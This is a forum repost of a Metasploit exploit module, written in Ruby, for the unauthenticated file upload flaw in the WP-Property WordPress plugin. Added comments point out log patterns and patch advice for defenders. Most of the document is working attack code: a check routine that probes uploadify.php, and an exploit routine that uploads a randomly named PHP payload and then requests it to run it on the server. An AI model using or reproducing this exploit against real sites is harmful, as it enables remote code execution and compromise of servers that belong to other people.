WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

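require 'msf/core'
require 'msf/core/exploit/php_exe'

# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (the description below states the affected range as
# <= 1.35.0). The plugin ships a third-party uploadify.php handler that
# accepts a multipart upload without authentication and stores the file
# where the web server will serve, and therefore execute, it.
#
# For defenders, the request pattern visible in this file is the thing to
# look for in web logs: a multipart POST to
#   <wordpress>/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
# carrying a "Filedata" part whose filename ends in .php, followed by a GET
# for the path the handler returned. Updating the plugin beyond the affected
# range, or removing/blocking the uploadify.php handler, closes the path
# this module depends on.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # The page rendered this constant as "Msf::Exploit: hpEXE" (the ":P" was
  # eaten by the forum's emoticon filter); the matching require above is
  # 'msf/core/exploit/php_exe'.
  include Msf::Exploit::PhpEXE

  # Registers module metadata (name, references, targets) and the single
  # user-facing option, TARGETURI, which defaults to '/wordpress'.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the upload handler with a plain GET.
  #
  # Returns CheckCode::Unknown when there is no response or the status is
  # not 200, and CheckCode::Appears otherwise.
  #
  # NOTE(review): a 200 only shows that uploadify.php is reachable. Nothing
  # here reads the plugin version or the response body, so "Appears" is a
  # hint for triage rather than confirmation that the site is in the
  # affected range.
  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    return Exploit::CheckCode::Unknown unless res && res.code == 200

    Exploit::CheckCode::Appears
  end

  # Uploads a PHP file through uploadify.php and then requests it.
  #
  # Steps, as the code below shows:
  #   1. Build a multipart body with two parts: "Filedata" (the PHP file,
  #      under a random five-letter name ending in .php) and "folder" (the
  #      uploadify directory under TARGETURI).
  #   2. POST it to uploadify.php. The upload counts as successful only if
  #      the reply is a 200 whose body contains the chosen file name.
  #   3. Treat the whole response body as the path of the stored file and
  #      issue a GET for it, which makes the server run the file.
  #
  # Fails with Failure::UnexpectedReply when step 2 does not succeed.
  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    # NOTE(review): :unlink_self presumably makes the dropped script delete
    # itself once it has run (confirm against the PhpEXE mixin). If so, the
    # file may already be gone from disk when responders look, and the web
    # server access log is the more reliable record of the upload.
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Drops a CRLF that sits directly in front of a "--_Part_" boundary
    # marker at the start of a line in the serialized message.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # The handler is expected to echo the stored file's path; a reply that
    # does not mention the file name is treated as a failed upload.
    unless res && res.code == 200 && res.body =~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end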

不要问我这写的是什么 怎么利用 我是说msf.